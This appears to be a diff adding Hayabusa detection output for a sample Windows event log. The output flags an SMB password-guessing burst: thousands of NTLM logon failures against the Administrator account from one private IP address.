+2016-09-20 01:50:06.513 +09:00,-,-,medium,CredAccess,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW_PW-Guessing_Count.yml,-
+2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2q1tdAUlxHGfGH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3EPNzcwy7tOAADWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AbwsMP10Rs4h1Wl1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EEcdqcpqsxQ4RgPx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngdtRwzXXhAlRxGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BbCFZw5qQgU7rQ9W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SXr7lA3MkV6xK36f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tVFs1kR0AuOutnuI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PkeEabFrDLsBVcXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GH7dTevmTKZo46Tq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l2E8JmrfaCj5AjSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N4FLUvawWPVqdLaD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KN0EeUzxSZy5l7J4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8FjH0QHqromIYWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fhlF37S1wNupiX5O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j19XhmSXK526I8kf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IRcppJXDNNfKuvdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0FoGAIAK2FV3zCJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uYWIk76XIksgN3sE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3FEop7o3SOolNvKs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMGEM3ql9uov7zCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EFPUA4pUPaLrkr1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7IeJU89jxitz407 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wqj9nXRaDpwCJZO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bl0d61v2Ux7cNv4r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LxTa5lyutrIB2cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPCy11e3YxcCloSH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mj07WKc4aQqPC0Te | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2M3v4TsQul5R4sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I67uBcH52tgLzhVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hsth68FDJ4F10H6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDoHrfWlaWZ5GbWV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uliC5Wd7uZR3fIBc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: Xhg4hg4XDFaXsJRe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Unknown Reason,User: Administrator | Type: 3 | Computer: ZrSGxwUyV6gCUPeb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUBgTr05x3djEYdM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 40PhGU4ZXu7uihop | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1DJ9r72hXZH9rEkb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: khy2BeyBb9wq00f7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1cDckicL7IMrO7OQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEEkvfVd3FCap6fa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGFSyHQ0ZNWofxzE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItOZqZSDTrdWpkbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhNdf5lHfrHKSCXq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg05F6tdf3kR9kdP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 70rRbaC6L6SzT15q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnJyN8wF21ff2L1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MUZHZJMQznj6GBqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9h52ZKMbXLuFvUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n95RJvcQnFrAG2iX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xI23nmysFlr1pvVf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nVsjcTxDdZbzkmMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMuWatQuNBh9UKdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfC3JZ3awqFDNQbm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 337h8PHN6Axi0iaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qGQpWOuzgETfxTgJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oFjlyMAJMI2zIC8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7exAVz3PlzJQ6Wcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RuYihjQpt76foAW3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlPm2vRh9EHN9J6n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n9jDy3NDDPe7XgyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AtGxqEKOoP6W3w0Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BLqYztXwV80UBez1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0yki1dEFZrnMLs2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jbE2z1W1wQgoTDso | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJmZFXFxiLuWWkMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x9EPwprgXSJNUFfg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h0ZjYxZ8K5m5F1vo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xSw7OjDv8ldqbm5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mk0BAdOI210HwPhX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSwWz57Kvl2XJVUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DLcfSrHT5bSsNnuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQDkbESps0PXWEUT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
